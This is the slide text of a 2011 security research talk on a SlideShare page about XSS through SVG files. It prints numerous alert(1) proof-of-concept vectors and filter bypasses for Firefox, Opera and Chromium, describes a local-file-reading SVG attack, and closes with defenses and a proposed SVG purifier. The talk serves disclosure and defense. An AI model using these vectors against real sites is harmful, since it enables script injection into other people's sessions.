SlideShare a Scribd company logo

The Image that called me - Active Content Injection with SVG Files

Mario Heiderich
Mario Heiderich

Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). Exploits discussed SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to lack of documentation and filters, and new vectors are found weekly. Future work proposed a SVG purifier and raising awareness of issues.

1 of 29
Downloaded 140 times
The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr- University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
Basic Example <svg xmlns=“http://www.w3.org/2000/svg“> <circle r=“40“ fill=“red“></circle> </svg>
SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
SVG in Action
Scripting ● The following SVG executes JavaScript <svg xmlns=“http://www.w3.org/2000/svg“> <script> alert(1) </script> </svg> ● More examples?
More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg">  <set attributeName="onmouseover" to="alert(1)"/>  </svg> <svg xmlns="http://www.w3.org/2000/svg">  <handler  xmlns:ev="http://www.w3.org/2001/xml­events"  ev:event="load" >alert(1)</handler> </svg>
Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list- style/content/cursor ● In-line SVG
Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely too be used in real life attacks! ● Porn sites, Email attachments, Malware
In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
More Opera ● SVG via favicon
Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click- jacking ● SVG and XBL? You tell me!
Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft
Ad

Recommended

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 
Angular introduction students
Angular introduction studentsAngular introduction students
Angular introduction students
Christian John Felix
 
Practical Use of MongoDB for Node.js
Practical Use of MongoDB for Node.jsPractical Use of MongoDB for Node.js
Practical Use of MongoDB for Node.js
async_io
 
Introduction to HTML5
Introduction to HTML5Introduction to HTML5
Introduction to HTML5
IT Geeks
 
Swagger / Quick Start Guide
Swagger / Quick Start GuideSwagger / Quick Start Guide
Swagger / Quick Start Guide
Andrii Gakhov
 
Lecture 2_ Intro to laravel.pptx
Lecture 2_ Intro to laravel.pptxLecture 2_ Intro to laravel.pptx
Lecture 2_ Intro to laravel.pptx
SaziaRahman
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich
 
New Elements & Features in HTML5
New Elements & Features in HTML5New Elements & Features in HTML5
New Elements & Features in HTML5
Jamshid Hashimi
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
Akshay Mathur
 
Basic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBasic Concept of Node.js & NPM
Basic Concept of Node.js & NPM
Bhargav Anadkat
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
AngularJS
AngularJS AngularJS
AngularJS
NexThoughts Technologies
 
Top Frontend Framework 2022
Top Frontend Framework 2022Top Frontend Framework 2022
Top Frontend Framework 2022
ElenorWisozk
 
JavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScriptJavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScript
Laurence Svekis ✔
 
Introduction to gradle
Introduction to gradleIntroduction to gradle
Introduction to gradle
NexThoughts Technologies
 
HTML5: features with examples
HTML5: features with examplesHTML5: features with examples
HTML5: features with examples
Alfredo Torre
 
TypeScript - An Introduction
TypeScript - An IntroductionTypeScript - An Introduction
TypeScript - An Introduction
NexThoughts Technologies
 
Front-End Frameworks: a quick overview
Front-End Frameworks: a quick overviewFront-End Frameworks: a quick overview
Front-End Frameworks: a quick overview
Diacode
 
Span and Div tags in HTML
Span and Div tags in HTMLSpan and Div tags in HTML
Span and Div tags in HTML
Biswadip Goswami
 
TypeScript
TypeScriptTypeScript
TypeScript
Fabian Vilers
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
CSS Animations & Transitions
CSS Animations & TransitionsCSS Animations & Transitions
CSS Animations & Transitions
Edward Meehan
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Svelte
SvelteSvelte
Svelte
University of Moratuwa, Katubedda, Sri Lanka
 
Curso JavaScript - Aula sobre DOM e Ajax
Curso JavaScript - Aula sobre DOM e AjaxCurso JavaScript - Aula sobre DOM e Ajax
Curso JavaScript - Aula sobre DOM e Ajax
Tiago Antônio da Silva
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
Mario Heiderich
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!
Cameron Jones
 
Ad

More Related Content

What's hot (20)

An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich
 
New Elements & Features in HTML5
New Elements & Features in HTML5New Elements & Features in HTML5
New Elements & Features in HTML5
Jamshid Hashimi
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
Akshay Mathur
 
Basic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBasic Concept of Node.js & NPM
Basic Concept of Node.js & NPM
Bhargav Anadkat
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
AngularJS
AngularJS AngularJS
AngularJS
NexThoughts Technologies
 
Top Frontend Framework 2022
Top Frontend Framework 2022Top Frontend Framework 2022
Top Frontend Framework 2022
ElenorWisozk
 
JavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScriptJavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScript
Laurence Svekis ✔
 
Introduction to gradle
Introduction to gradleIntroduction to gradle
Introduction to gradle
NexThoughts Technologies
 
HTML5: features with examples
HTML5: features with examplesHTML5: features with examples
HTML5: features with examples
Alfredo Torre
 
TypeScript - An Introduction
TypeScript - An IntroductionTypeScript - An Introduction
TypeScript - An Introduction
NexThoughts Technologies
 
Front-End Frameworks: a quick overview
Front-End Frameworks: a quick overviewFront-End Frameworks: a quick overview
Front-End Frameworks: a quick overview
Diacode
 
Span and Div tags in HTML
Span and Div tags in HTMLSpan and Div tags in HTML
Span and Div tags in HTML
Biswadip Goswami
 
TypeScript
TypeScriptTypeScript
TypeScript
Fabian Vilers
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
CSS Animations & Transitions
CSS Animations & TransitionsCSS Animations & Transitions
CSS Animations & Transitions
Edward Meehan
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Svelte
SvelteSvelte
Svelte
University of Moratuwa, Katubedda, Sri Lanka
 
Curso JavaScript - Aula sobre DOM e Ajax
Curso JavaScript - Aula sobre DOM e AjaxCurso JavaScript - Aula sobre DOM e Ajax
Curso JavaScript - Aula sobre DOM e Ajax
Tiago Antônio da Silva
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich
 
New Elements & Features in HTML5
New Elements & Features in HTML5New Elements & Features in HTML5
New Elements & Features in HTML5
Jamshid Hashimi
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
Akshay Mathur
 
Basic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBasic Concept of Node.js & NPM
Basic Concept of Node.js & NPM
Bhargav Anadkat
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
AngularJS
AngularJS AngularJS
AngularJS
NexThoughts Technologies
 
Top Frontend Framework 2022
Top Frontend Framework 2022Top Frontend Framework 2022
Top Frontend Framework 2022
ElenorWisozk
 
JavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScriptJavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScript
Laurence Svekis ✔
 
Introduction to gradle
Introduction to gradleIntroduction to gradle
Introduction to gradle
NexThoughts Technologies
 
HTML5: features with examples
HTML5: features with examplesHTML5: features with examples
HTML5: features with examples
Alfredo Torre
 
TypeScript - An Introduction
TypeScript - An IntroductionTypeScript - An Introduction
TypeScript - An Introduction
NexThoughts Technologies
 
Front-End Frameworks: a quick overview
Front-End Frameworks: a quick overviewFront-End Frameworks: a quick overview
Front-End Frameworks: a quick overview
Diacode
 
Span and Div tags in HTML
Span and Div tags in HTMLSpan and Div tags in HTML
Span and Div tags in HTML
Biswadip Goswami
 
TypeScript
TypeScriptTypeScript
TypeScript
Fabian Vilers
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
CSS Animations & Transitions
CSS Animations & TransitionsCSS Animations & Transitions
CSS Animations & Transitions
Edward Meehan
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Svelte
SvelteSvelte
Svelte
University of Moratuwa, Katubedda, Sri Lanka
 
Curso JavaScript - Aula sobre DOM e Ajax
Curso JavaScript - Aula sobre DOM e AjaxCurso JavaScript - Aula sobre DOM e Ajax
Curso JavaScript - Aula sobre DOM e Ajax
Tiago Antônio da Silva
 

Viewers also liked (18)

JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
Mario Heiderich
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!
Cameron Jones
 
Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!
Bronson Quick
 
Create a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordCreate a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single word
Nik Cree
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
Kevin Hakanson
 
Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3
Pascal Rettig
 
Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)
Ariya Hidayat
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
Mario Heiderich
 
Image Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaImage Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress Media
Rich Plakas
 
Cern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWCern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWW
divadwg
 
Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3
Xavier Damman
 
HTML5 어디까지 왔나?
HTML5 어디까지 왔나?HTML5 어디까지 왔나?
HTML5 어디까지 왔나?
정현 황
 
The WordPress Industry Survey 2016
The WordPress Industry Survey 2016The WordPress Industry Survey 2016
The WordPress Industry Survey 2016
WP Engine
 
Realm: Building a mobile database
Realm: Building a mobile databaseRealm: Building a mobile database
Realm: Building a mobile database
Christian Melchior
 
Danger Of Free
Danger Of FreeDanger Of Free
Danger Of Free
Alex Iskold
 
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffStuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Cezary Podkul
 
Владимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыВладимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работы
Nikolenko
 
Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18
Wessel van Leeuwen
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
Mario Heiderich
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!
Cameron Jones
 
Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!
Bronson Quick
 
Create a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordCreate a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single word
Nik Cree
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
Kevin Hakanson
 
Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3
Pascal Rettig
 
Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)
Ariya Hidayat
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
Mario Heiderich
 
Image Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaImage Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress Media
Rich Plakas
 
Cern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWCern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWW
divadwg
 
Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3
Xavier Damman
 
HTML5 어디까지 왔나?
HTML5 어디까지 왔나?HTML5 어디까지 왔나?
HTML5 어디까지 왔나?
정현 황
 
The WordPress Industry Survey 2016
The WordPress Industry Survey 2016The WordPress Industry Survey 2016
The WordPress Industry Survey 2016
WP Engine
 
Realm: Building a mobile database
Realm: Building a mobile databaseRealm: Building a mobile database
Realm: Building a mobile database
Christian Melchior
 
Danger Of Free
Danger Of FreeDanger Of Free
Danger Of Free
Alex Iskold
 
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffStuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Cezary Podkul
 
Владимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыВладимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работы
Nikolenko
 
Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18
Wessel van Leeuwen
 
Ad

Similar to The Image that called me - Active Content Injection with SVG Files (20)

HTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentHTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web Development
Tilak Joshi
 
JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3
Helder da Rocha
 
Html5 more than just html5 v final
Html5 more than just html5 v finalHtml5 more than just html5 v final
Html5 more than just html5 v final
Lohith Goudagere Nagaraj
 
HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!
Iker Jamardo
 
Thats Not Flash?
Thats Not Flash?Thats Not Flash?
Thats Not Flash?
Mike Wilcox
 
Academy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsAcademy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphics
Binary Studio
 
Rich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptRich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScript
Gjokica Zafirovski
 
SVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilitySVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader Accessibility
Dennis Lembree
 
Html 5 svg
Html 5 svgHtml 5 svg
Html 5 svg
AbhishekMondal42
 
WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)
Shumpei Shiraishi
 
Next generation Graphics: SVG
Next generation Graphics: SVGNext generation Graphics: SVG
Next generation Graphics: SVG
David Corbacho Román
 
Learn svg
Learn svgLearn svg
Learn svg
FitBlar Mit
 
Accessibility Hacks version 2
Accessibility Hacks version 2Accessibility Hacks version 2
Accessibility Hacks version 2
Graham Armfield
 
Accessibility Hacks Version 2
Accessibility Hacks Version 2Accessibility Hacks Version 2
Accessibility Hacks Version 2
Graham Armfield
 
Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018
Graham Armfield
 
Streaming of SVG animations on the Web
Streaming of SVG animations on the WebStreaming of SVG animations on the Web
Streaming of SVG animations on the Web
Cyril Concolato
 
Canvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewCanvas Based Presentation tool - First Review
Canvas Based Presentation tool - First Review
Arvind Krishnaa
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
Nathan Smith
 
Java script Session No 1
Java script Session No 1Java script Session No 1
Java script Session No 1
Saif Ullah Dar
 
Html5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsHtml5 Canvas and Mobile Graphics
Html5 Canvas and Mobile Graphics
Engin Hatay
 
HTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentHTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web Development
Tilak Joshi
 
JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3
Helder da Rocha
 
Html5 more than just html5 v final
Html5 more than just html5 v finalHtml5 more than just html5 v final
Html5 more than just html5 v final
Lohith Goudagere Nagaraj
 
HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!
Iker Jamardo
 
Thats Not Flash?
Thats Not Flash?Thats Not Flash?
Thats Not Flash?
